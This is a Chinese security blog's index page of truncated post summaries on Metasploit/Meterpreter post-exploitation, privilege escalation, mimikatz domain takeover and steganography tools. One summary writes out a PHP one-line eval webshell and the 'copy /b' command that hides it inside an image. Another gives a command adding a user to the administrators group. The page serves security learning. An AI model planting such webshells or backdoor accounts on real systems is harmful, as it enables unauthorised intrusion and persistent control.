摘要:
如下图所示,允许ensp相关应用通过防火墙 阅读全文
posted @ 2020-07-08 19:34
kalibb
阅读(7557)
评论(0)
推荐(1)
摘要:
后渗透之meterpreter使用攻略 Metasploit中的Meterpreter模块在后渗透阶段具有强大的攻击力,本文主要整理了meterpreter的常用命令、脚本及使用方式。包含信息收集、提权、注册表操作、令牌操纵、哈希利用、后门植入等。 0x01.系统命令 1)基本系统命令 sessio 阅读全文
posted @ 2020-06-05 17:46
kalibb
阅读(3123)
评论(0)
推荐(0)
摘要:
MSF后渗透包括:提权,进程迁移,令牌假冒,获取凭证,操作文件系统,系统其它操作,端口转发和内网代理,后门 提权 通常webshell的权限都比较低,能够执行的操作有限,没法查看重要文件、修改系统信息、抓取管理员密码和hash、安装特殊程序等,所以我们需要获取系统更高的权限。 绕过UAC 用户帐户控 阅读全文
posted @ 2020-05-22 11:53
kalibb
阅读(242)
评论(0)
推荐(0)
摘要:
一.前言本文及以后系列仅限于针对小白的学习,首先我们先大体了解一下我们要做的渗透到底有哪些,渗透包括但不限于前端渗透(web安全),后渗透及内网渗透,此系列为后渗透的讲解。 二.什么是后渗透我们了解到前端安全包括了SQL注入,任意文件上传,XSS,CSRF,逻辑漏洞,跨域漏洞等等,我们知道我们都想将 阅读全文
posted @ 2020-05-22 11:49
kalibb
阅读(1290)
评论(0)
推荐(0)
摘要:
net localgroup administrators 用户名 /add >使用这句命令添加用户到管理组 shutdown -g 重启电脑 阅读全文
posted @ 2020-05-22 11:37
kalibb
阅读(1084)
评论(0)
推荐(0)
摘要:
1.查看当前的主机名 1 2 3 4 5 6 7 8 9 10 11 12 13 14 [root@localhost datas]# hostname localhost [root@localhost datas]# hostnamectl Static hostname: localhost. 阅读全文
posted @ 2020-05-15 18:42
kalibb
阅读(930)
评论(0)
推荐(0)
摘要:
新建一个文件夹 在其中放入一张图片文件tp.jpg,和yjh.php一句话木马 yjh.php中的一句话木马内容为<?php @eval($_POST[yjh]);?>和一个写入cmd的bat文件点击bat文件进入DOS命令,写入"copy tp.jpg/b+yjh.php tpyjh.jpg" 回 阅读全文
posted @ 2020-05-12 18:38
kalibb
阅读(10900)
评论(0)
推荐(0)
摘要:
各工具kali官方简介(竖排):https://tools.kali.org/tools-listing 安装kali虚拟机可参考:https://www.cnblogs.com/lsdb/p/6500757.html pentestbox:虚拟机还是比较耗内存的,内存不够可以试试pentestbo 阅读全文
posted @ 2020-05-07 21:21
kalibb
阅读(10147)
评论(0)
推荐(0)
摘要:
zsteg可以检测PNG和BMP图片里的隐写数据。 目前,zsteg支持检测: LSB steganography in PNG & BMP zlib-compressed data OpenStego Camouflage 1.2.1 LSB with The Eratosthenes set g 阅读全文
posted @ 2020-05-07 12:33
kalibb
阅读(3488)
评论(0)
推荐(0)
摘要:
0x01 简介 mimikatz,很多人称之为密码抓取神器,但在内网渗透中,远不止这么简单 0x02 测试环境 网络资源管理模式: 域 已有资源: 域内一台主机权限 操作系统:win7 x64 域权限:普通用户 0x03 测试目标 1、获得域控权限 2、导出所有用户口令 3、维持域控权限 0x04 阅读全文
posted @ 2020-05-07 11:05
kalibb
阅读(1685)
评论(0)
推荐(0)
浙公网安备 33010602011771号